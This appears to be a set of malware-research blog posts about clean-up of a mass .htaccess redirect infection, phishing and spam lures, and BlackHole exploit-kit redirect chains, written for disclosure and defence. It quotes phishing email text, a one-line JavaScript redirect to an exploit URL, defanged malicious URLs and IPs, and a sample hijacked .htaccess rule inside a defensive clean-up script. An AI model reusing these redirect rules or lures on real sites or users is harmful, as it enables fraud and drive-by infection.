The hunt for the secret malicious .htaccess file

Yesterday I cleaned up the largest web malware infection I have ever done. It involved 18 infected websites (77,518 php and html files) hosted on GoDaddy.

I am documenting the process here as it may help other people.

One of the main symptoms that led to the first identification was a redirection to a Fake AV site. Digging deeper I only found more bad stuff…

Fake AV scam:

The redirection is done through tradehilton.ru and tradeincas.ru.

Porn redirections:

A PayPal phishing scam:

Backdoors and shells:

The main redirection was orchestrated by a whopping 181 infected .htaccess files. Here is what a hacked .htaccess file looks like:

As you can see, any request from that site that matches the criteria is sent to the malicious site “tradeincas.ru”.

The cleanup process started with a complete local backup of the entire directory structure (18 websites). This was done through FTP and took a full night.

After removing all backdoors and cleansing the .htaccess files the redirection was still happening and that left me puzzled. I had used all the grep commands I could think of and was certain all the bad stuff was gone.

At this point I requested our customer to ask for SSH access. GoDaddy has a security policy in place where they will phone you to give you a pin that lets you activate SSH. This is very good practice and they were quick about it.

While SSH gave me direct access to run my commands, one issue made my job more difficult. One particular command (grep -r -l 'tradeincas' *) would not complete. It seemed to time out after a few minutes with an error of “Terminated”. This could have been due to the very large directory structure and possibly a safety mechanism from GoDaddy’s side that limits the amount of CPU given to a particular user on a shared hosting.

This annoyed me greatly as I now had to run that command on each folder one by one. But then something came to mind and I went back to the very root of the folder and ran a special command:

find . -name .htaccess -exec grep 'tradeincas' {} \;

For some reason, this command would not generate the error mentioned above and it found the one .htaccess file that was tormenting me. However, this file was located one directory above what the FTP access gave me as root, meaning I would never have been able to find it without SSH:

In FTP, using both GoDaddy’s web version and FileZilla, the top directory is html, while with SSH I can go back to the one above:

So, despite cleaning the other 181 .htaccess files, it would never stop redirecting until the main one sitting at the very top was taken care of.

After renaming it to .htaccess.bak (creates a backup and disables it), everything went back to normal.
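The hunt described above, as an added example that is not code from the original post: a POSIX shell script that lists every .htaccess file under a root mentioning an indicator string (one short grep per file via find -exec, the shape of command that completed where grep -r was killed) and disables the hits by renaming them to .htaccess.bak. The demo tree, the .htaccess sitting one level above html/, and the rewrite rule inside it are constructed for this example.

```shell
#!/bin/sh
# Added example, not code from the original post. Finds .htaccess files under
# a web root that mention an indicator string and disables them by renaming
# them to .htaccess.bak, as done in the clean-up above.

# List every .htaccess file below $1 containing the string $2.
# find -exec runs one short grep per file instead of a single long grep -r,
# so no single process runs long enough to trip a shared-host CPU limit.
find_bad_htaccess() {
    find "$1" -name .htaccess -type f -exec grep -l -- "$2" {} \;
}

# Rename each hit to <file>.bak (Apache ignores it, and the copy is kept for
# later analysis). Prints the number of files disabled.
disable_bad_htaccess() {
    n=0
    list=$(mktemp)
    find_bad_htaccess "$1" "$2" > "$list"
    while IFS= read -r f; do
        mv "$f" "$f.bak"
        n=$((n + 1))
    done < "$list"
    rm -f "$list"
    echo "$n"
}

# Constructed demo tree: the root holds a hijacked .htaccess one level above
# html/ (the file FTP could not reach), one site copies it, one site is clean.
make_demo_tree() {
    root=$(mktemp -d)
    mkdir -p "$root/html/site1" "$root/html/site2"
    cat > "$root/.htaccess" <<'EOF'
RewriteEngine On
RewriteCond %{HTTP_REFERER} (google|bing|yahoo) [NC]
RewriteRule .* http://tradeincas.ru/ [R,L]
EOF
    cp "$root/.htaccess" "$root/html/site2/.htaccess"
    printf 'Options -Indexes\n' > "$root/html/site1/.htaccess"
    echo "$root"
}
```

Run it from the real top-level directory (the one SSH reaches), not the FTP root, or the file that matters is never scanned.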

Part of the operation involved updating 8 Joomla websites which I did simultaneously using as many FileZilla windows to upload the new Joomla setups.

A few things learned: SSH is crucial to cleaning up an infected website. It can be done with FTP sometimes but overall SSH is way faster and more thorough. The GoDaddy user interface to manage your account is not very user-friendly to say the least. What bothered me the most was to click on links that redirected me to services I needed to buy while I was looking for functional features. Mixing the marketing promo stuff with account settings is a cheap way to try to generate more revenue from your customers while frustrating them at the same time. However, the GoDaddy team was quick to respond and professional, so maybe that evens things out.

Jerome Segura

Back to the Citi malware

This spam email is not a phishing scam that is after your banking information (at least not right away). Instead, it wants to add your computer to a large botnet.

Clicking on the link launches the drive-by download infection. It’s one of those situations where you can’t finish swearing before it’s too late:

A successful infection loads the following:


The Java exploit currently has 0 detection on VirusTotal.

Jerome Segura

Exposed Intranet serves malware

A simple Google search for a malware string reveals a private intranet site, not so private…

This company’s court records are publicly available. The data which contains sensitive information has been sanitized for obvious reasons.

As if that wasn’t enough, the page is also a host for a malicious script (a0v.org/x.js):

What is worse? Data leak or malware? You be the judge.

To publish or not to publish malware links?

Today I got into a little debate on Twitter with fellow researchers @dimitribest, @nicolasbrulez and @virusbtn about whether or not publishing malware links in blog postings is acceptable.

Here is my opinion on the debate:

  • Large security companies are tied to potential legal issues and posting malicious URLs within a blog presents a risk. I do believe the researchers who say they want to prevent unnecessary infections, but at the same time I feel like the big corporations they work for are more worried about possible lawsuits with people clicking links by mistake and infecting their PC. For them, it could be legal battles costing them millions of dollars.
  • Including malicious links is used by many as a marketing / SEO technique to generate buzz and traffic. Naming (and shaming) a well-known website means you get your name in the press with all the benefits it entails.
  • In some cases, including full links can be used to prove that you indeed discovered something (and not just made it up).
  • Many security researchers, including myself, post full links because we feel we should share our discovery with others. I like to read other people’s blogs and follow such and such links they posted to do my own bit of research. Sure, I could ask them but it introduces barriers etc…

Is the argument that people can get infected really valid? I think taking the necessary precautions such as including a disclaimer, making the links non-clickable, and labeling them clearly as harmful is enough. The argument that people can still copy and paste the link to get infected is weak in my opinion. If someone really did that, they are making a conscious decision… it is not just an accidental click of the mouse… After all, Google doesn’t prevent people from copying and pasting in its “this site may harm your computer” warning, it just blocks the hyperlink:

However, I think there are a couple of exceptions to openly sharing malicious links:

  • In some cases, you may not want to make a powerful tool (such as an exploit toolkit) available to the masses. By publishing the link, you could easily ‘give away’ a weapon to people who have the intent of using it for their own good to harm other users.
  • Some malware research can involve sensitive data and not letting the cat out of the bag makes sense. Obfuscating or blurring the URL can protect the writer against personal reprisals from malware authors, or simply avoid letting the bad guys know you have penetrated their network.

Jerome Segura

Exploit-friendly domain, malware and a very dirty French host

Our journey starts with the domain hxxp://jbhx0aibh1zl.az.pl/ (IP address: 109.234.111.23, Poland) that hosts several landing pages typical of the drive-by download exploits we see with the BlackHole kit.

There’s also one folder, 7X0GYVjk, where we find a sample of the Zbot Trojan family:

The actual exploit-driven pages (all the other folders) contain a redirect to a malicious JavaScript file hosted on:

hunmuhendislik.com (IP address: 95.173.190.224, Turkey)

The JavaScript file js.js contains one line, which is our final destination and where our fun begins:

document.location='hxxp://91.121.84.204:8080/showthread.php?t=977334ca118fcb8c';

Location: Roubaix, France.

That link is an exploit URL, although it is no longer active.

Other domains on that IP include one about the best of the web:

Apparently it is limited to porn, webcams, warez and free movies:

Another domain on the same IP that is loaded with malware: gamespile.fr

The garbled code translates into iframes (big surprise):

hxxp://cibudit.ru/count20.php
hxxp://jazzute.ru/count5.php

So all in all, that IP is not somewhere you want to hang out too often. ;-)

Jerome Segura

Canada Revenue Agency scam

Today is the deadline for submitting your tax return (in Canada). So receiving the following email may seem like the perfect timing:

Recent annual calculation of your fiscal activity, our record indicate you are eligible
to receive a tax refund of $1500.00 (PENDING) Please submit a verified tax refund
request and allow us in order to process it. Click the “Refund Me Now” link below and
follow the on screen step in order to have us process your request.

The link (zoe-flury.com/wp-content/plugins/sitemap-generator/index.html) is thankfully no longer active.

Jerome Segura

Skype phishing scam

Skype scam:

Dear Skype Member:

As part of our security measures, we regularly screen activity in the Skype system.We recently contacted you after noticing an issue on your account
This is the Last reminder to log in to Skype as soon as possible. Once you log in, you will be provided with steps to restore your account access.
We appreciate your understanding as we work to ensure account safety.

Fortunately, the link (mvstudioweb.com/templates/atomic/html/mod_menu/intl/en/account/login/) is no longer working.

Jerome Segura

Verizon spam loads malware

Verizon customers beware. If you are set to receive and pay your bills online, this email scam could very well fool you and infect your PC:

Your bill payment has been applied to your Verizon Wireless account.

Traffic log:


The exploit is located on a Lithuanian server (77.79.9.54).

Jerome Segura

Look for a job, get malware

If you are looking for a job, don’t blindly click on the first offer you see in your mailbox:

The link loads ‘additional information’ (the exploit page).

Traffic log:


Here is the login page for the corresponding exploit kit (BlackHole):

One of the exploits (Java) is not detected by any AV on VirusTotal:

Edu.jar (VirusTotal 0/42)

Jerome Segura